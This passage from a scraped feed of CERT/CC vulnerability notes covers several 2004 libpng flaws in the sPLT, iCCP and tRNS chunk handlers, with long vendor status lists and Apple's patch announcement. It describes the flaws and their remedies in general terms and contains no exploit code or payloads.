Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### Wind River Systems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\n### uNisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23477512 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0599](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0599>) \n---|--- \n**Severity Metric:** | 0.76 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-01 20:45 UTC \n**Document Revision: ** | 18 \n", "modified": "2005-06-01T20:45:00", "published": "2004-08-04T00:00:00", "id": "VU:477512", "href": "https://www.kb.cert.org/vuls/id/477512", "type": "cert", "title": "libpng png_handle_sPLT() integer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-04T23:47:23", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a remotely exploitable vulnerability that could cause affected applications to crash.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nUnder some circumstances, a null pointer may be dereferenced during a memory allocation in the `png_handle_iCCP()` function. 
As a result, a PNG file with particular characteristics could cause the affected application to crash. Similar errors are reported to exist in other locations within libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nAn attacker could cause a vulnerable application to crash by supplying a specially crafted PNG image. Vulnerable applications that read images from network sources could be exploited remotely. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n236656\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer, Inc. __ Affected\n\nNotified: July 16, 2004 Updated: June 01, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. 
After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. \n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Debian Linux Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Hewlett-Packard Company Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor 
Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Mandriva, Inc. Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMandrakeSoft has published Mandrake Security Advisory [MDKSA-2004:079](<http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### MontaVista Software, Inc. 
Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Red Hat, Inc. 
Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### SUSE Linux Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Sun Microsystems, Inc. 
Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). 
An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Hitachi Not Affected\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. 
\n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Berkeley Software Design, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### FreeBSD, Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### IBM Corporation Unknown\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### IBM-zSeries Unknown\n\nNotified: July 16, 2004 Updated: August 20, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Immunix Unknown\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Ingrian Networks, Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Novell, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### SCO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional 
information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Sequent Computer Systems, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Unisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional 
comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### Wind River Systems, Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23236656 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0598](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0598>) \n---|--- \n**Severity Metric:** | 1.05 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2007-07-21 02:33 UTC \n**Document Revision: ** | 
17 \n", "modified": "2007-07-21T02:33:00", "published": "2004-08-04T00:00:00", "id": "VU:236656", "href": "https://www.kb.cert.org/vuls/id/236656", "type": "cert", "title": "libpng png_handle_iCCP() NULL pointer dereference", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:45", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599", "CVE-2004-0743", "CVE-2004-0744"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a remotely exploitable vulnerability, which could lead to arbitrary code execution on an affected system.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format. \n\nAccording to the PNG [Chunk Specification](<http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html>), PNG images contain a series of chunks including the IHDR, IDAT, and IEND chunks. In addition to these required chunks, a PNG image may contain one or more optional chunks. The optional tRNS chunk is responsible for specifying images that use simple transparency. There are several components of the tRNS chunk. If the PLTE block is not present in a tRNS chunk, a logic error in the code responsible for validating the data segments of the tRNS chunk may lead to a buffer overflow condition. \n \nThe buffer overflow vulnerability occurs in the `png_handle_tRNS()` function, which is responsible for ensuring that PNG images are formatted properly. When processing malformed PNG images, this function may fail to properly validate the length of the transparency chunk (tRNS) data. 
\n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because many products have used the libpng reference library to implement native PNG image processing, many applications are affected by this issue, each in a different way. \n \nPlease note that this vulnerability is known to exist in Microsoft Windows Messenger and MSN Messenger. Please see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) for more details. For information regarding how this vulnerability affects Microsoft Internet Explorer, refer to [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). \n \n--- \n \n### Impact \n\nBy introducing a malformed PNG image to a vulnerable application, a remote attacker could cause the application to crash or potentially execute arbitrary code with the privileges of the current user. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n### Apple Computer Inc. 
__ Affected\n\nNotified: July 16, 2004 Updated: May 17, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. \n \n================== \n \nComponent: Safari \nCVE ID: CAN-2004-0743 \nImpact: In a special situation, navigation using the forward/backward \nbuttons can re-send form data to a GET url. \n \nDescription: This is for a situation where a web form is sent to a \nserver using a POST method which issues an HTTP redirect to a GET \nmethod url. Using the forward/backward buttons will cause Safari to \nre-POST the form data to the GET url. Safari has been modified so \nthat in this situation forward/backward navigation will result in only \na GET method. \n \n================== \n \nComponent: TCP/IP Networking \nCVE ID: CAN-2004-0744 \nImpact: Maliciously crafted IP fragments can use too many system \nresources preventing normal network operation. \n \nDescription: The \"Rose Attack\" describes a specially constructed \nsequence of IP fragments designed to consume system resources. 
The \nTCP/IP implementation has been modified to limit the resources \nconsumed and prevents this denial of service attack. \n \n================================================ \n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/> \n \nInformation will also be posted to the Apple Product Security \nweb site: \n<http://www.apple.com/support/security/security_updates.html> \n \nThis message is signed with Apple's Product Security PGP key, \nand details are available at: \n<http://www.apple.com/support/security/security_pgp.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Microsoft 